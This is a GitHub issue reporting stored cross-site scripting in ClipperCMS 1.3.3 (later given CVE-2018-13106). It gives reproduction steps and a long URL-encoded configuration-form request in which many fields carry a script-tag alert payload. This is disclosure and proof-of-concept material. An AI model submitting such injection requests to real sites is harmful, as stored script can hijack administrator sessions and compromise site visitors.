This repository has been archived by the owner on Jul 22, 2020. It is now read-only.

Stored XSS is found in CMS Clipper_1.3.3 version #489

Open
PrincyEdward opened this issue Jul 3, 2018 · 1 comment


Affected Version : Clipper_1.3.3
Affected URL:
http://{host}/ClipperCMS-clipper_1.3.3/manager/
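Steps to reproduce (PoC):
1. In the manager, go to Tools -> Configuration.
Multiple stored XSS issues were found: many configuration fields accept and store a script payload. The request parameters submitted with the form are shown below (URL-encoded); the affected fields are those whose value contains the `<script>` test payload.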
valid_hostnames=%22%3Cscript%3Ealert%281%29%22%3C%2Fscript%3E&modx_charset=iso-8859-1&xhtml_urls=1&site_start=1%22%3Cscript%3Ea&error_page=1%22%3Cscript%3Ea&unauthorized_page=1%22%3Cscript%3Ea&site_status=1&site_unavailable_page=%22%3Cscript%3Eal&reload_site_unavailable=&site_unavailable_message=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&siteunavailable_message_default=The+site+is+currently+unavailable.&track_visitors=0&auto_template_logic=parent&template_rules_tv=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&default_template=3&old_template=3&publish_default=0&cache_default=0&search_default=0&auto_menuindex=1&txt_custom_contenttype=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&custom_contenttype=%2C%22%3Cscript%3Ealert%281%29%22%3C%2Fscript%3E%2C%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E%2Capplication%2Fpdf%2Capplication%2Frss%2Bxml%2Capplication%2Fvnd.ms-excel%2Capplication%2Fvnd.ms-word%2Ctext%2Fcss%2Ctext%2Fhtml%2Ctext%2Fjavascript%2Ctext%2Fplain%2Ctext%2Fxml&server_offset_time=-68400&server_protocol=http&rss_len=%22%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&error_handling_deprecated=1&error_handling_silent=0&jquery_url=assets%2Fjs%2Fjquery.min.js%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&jquery_plugin_dir=assets%2Fjs%2F%2F%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&jquery_noconflict=1&friendly_urls=0&friendly_url_prefix=&friendly_url_suffix=.html&friendly_alias_urls=1&use_alias_path=0&allow_duplicate_alias=0&automatic_alias=1&use_udperms=1&udperms_allowroot=0&failed_login_attempts=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&webuser_hash_method=1&blocked_minutes=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&reload_captcha_words=&captcha_words=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&captcha_words_default=ClipperCMS%2CAccess%2CBetter%2CBitCode%2CChunk%2CCache%2CDesc%2CDesign%2CExcell%2CEnjoy%2CURLs%2CTechView%2CGerald%2CGriff%2CHumphrey%2CHoliday%2CIntel%2CIntegration%2CJoystick%2CJoin%28%29%2COscope%2CGenetic%2CLight%2CLikeness%2CMa
rit%2CMaaike%2CNiche%2CNetherlands%2COrdinance%2COscillo%2CParser%2CPhusion%2CQuery%2CQuestion%2CRegalia%2CRighteous%2CSnippet%2CSentinel%2CTemplate%2CThespian%2CUnity%2CEnterprise%2CVerily%2CTattoo%2CVeri%2CWebsite%2CWideWeb%2CYap%2CYellow%2CZebra%2CZygote&emailsender=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&smtp=0&smtp_host=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&smtp_port=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&smtp_prefix=ssl%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&smtp_user=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&smtp_pass=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&reload_emailsubject=&emailsubject=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&emailsubject_default=Your+login+details&reload_signupemail_message=&signupemail_message=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&system_email_signup_default=Hello+%5B%2Buid%2B%5D+%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D+Content+Manager%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+the+Content+Manager+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&reload_websignupemail_message=&websignupemail_message=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E%0D%0AOnce+you+log+into+%5B%2Bsname%2B%5D+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&system_email_websignup_default=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+%5B%2Bsname%2B%5D+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&reload_system_email_webreminder_message=&webpwdreminder_message=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&system_email_webreminder_default=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0ATo+activate+your+new+password+click+the+following+link%3A
%0D%0A%0D%0A%5B%2Bsurl%2B%5D%0D%0A%0D%0AIf+successful+you+can+use+the+following+password+to+login%3A%0D%0A%0D%0APassword%3A%5B%2Bpwd%2B%5D%0D%0A%0D%0AIf+you+did+not+request+this+email+then+please+ignore+it.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&manager_language=english&manager_theme=ClipperModern&warning_visibility=1&docid_visibility=1&tree_page_click=27&remember_last_tab=1&tree_show_protected=0&rss_url_news=http%3A%2F%2Fwww.clippercms.com%2Fforum%2Fextern.php%3Faction%3Dfeed%26fid%3D3%2C31%26type%3Drss%26order%3Dposted%22%3Cscript%3Ealert%281%29%22%3C%2Fscript%3E&rss_url_security=http%3A%2F%2Fwww.clippercms.com%2Fforum%2Fextern.php%3Faction%3Dfeed%26fid%3D22%26type%3Drss%26order%3Dposted%22%3Cscript%3Ealert%281%29%22%3C%2Fscript%3E&datepicker_year_range=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&date_format=mm%2Fdd%2Fyy&time_format=HH%3Amm%3Ass&number_of_logs=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&number_of_results=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&validate_referer=1&strip_image_paths=1&use_browser=1&rb_webuser=0&rb_base_dir=%2F%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&rb_base_url=assets%2F%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&file_browser=mcpuk&upload_images=bmp%2Cico%2Cgif%2Cjpeg%2Cjpg%2Cpng%2Cpsd%2Ctif%2Ctiff%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&upload_media=au%2Cavi%2Cmp3%2Cmp4%2Cmpeg%2Cmpg%2Cwav%2Cwmv%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&upload_flash=fla%2Cflv%2Cswf%22%3Cscript%3Ealert%281%29%3B%22%3C%2Fscript%3E&clean_uploaded_filename=0&use_editor=1&which_editor=TinyMCE&fe_editor_lang=english&editor_css_path=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&tinymce_editor_theme=editor&tinymce_custom_plugins=style%2Cadvimage%2Cadvlink%2Csearchreplace%2Cprint%2Ccontextmenu%2Cpaste%2Cfullscreen%2Cnonbreaking%2Cxhtmlxtras%2Cvisualchars%2Cmedia%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&tinymce_custom_buttons1=undo%2Credo%2Cselectall%2Cseparator%2Cpastetext%2Cpasteword%2Cseparator%2Csearch%2Creplace
%2Cseparator%2Cnonbreaking%2Chr%2Ccharmap%2Cseparator%2Cimage%2Clink%2Cunlink%2Canchor%2Cmedia%2Cseparator%2Ccleanup%2Cremoveformat%2Cseparator%2Cfullscreen%2Cprint%2Ccode%2Chelp%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&tinymce_custom_buttons2=bold%2Citalic%2Cunderline%2Cstrikethrough%2Csub%2Csup%2Cseparator%2Cbullist%2Cnumlist%2Coutdent%2Cindent%2Cseparator%2Cjustifyleft%2Cjustifycenter%2Cjustifyright%2Cjustifyfull%2Cseparator%2Cstyleselect%2Cformatselect%2Cseparator%2Cstyleprops%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&tinymce_custom_buttons3=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&tinymce_custom_buttons4=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&tinymce_css_selectors=%22%3Cscript%3Ealert%281%29%22%3C%2Fscript%3E&filemanager_path=%2Fvar%2Fwww%2Fhtml%2Fclient63.lab%2Fsuganya%2FClipperCMS%2FClipperCMS-clipper_1.3.3%2F%22%3Cscript%3Ealert%281%29%22%3C%2Fscript%3E&upload_files=aac%2Cau%2Cavi%2Ccss%2Ccache%2Cdoc%2Cdocx%2Cgz%2Cgzip%2Chtaccess%2Chtm%2Chtml%2Cjs%2Cmp3%2Cmp4%2Cmpeg%2Cmpg%2Cods%2Codp%2Codt%2Cpdf%2Cppt%2Cpptx%2Crar%2Ctar%2Ctgz%2Ctxt%2Cwav%2Cwmv%2Cxls%2Cxlsx%2Cxml%2Cz%2Czip%2C%22%3Cscript%3Ealert%2810%22%3C%2Fscript%3E&upload_maxsize=1048576%22%3Cscript%3Ealert%281%29%3B%22%3C%2Fscript%3E&new_file_permissions=%22%22%3Cscript%3Ealert%281%29%3B%22%3C%2Fscript%3E&new_folder_permissions=%22%22%3Cscript%3Ealert%281%29%3B%22%3C%2Fscript%3E


fgeek commented Nov 12, 2018

CVE-2018-13106 has been assigned for this vulnerability.
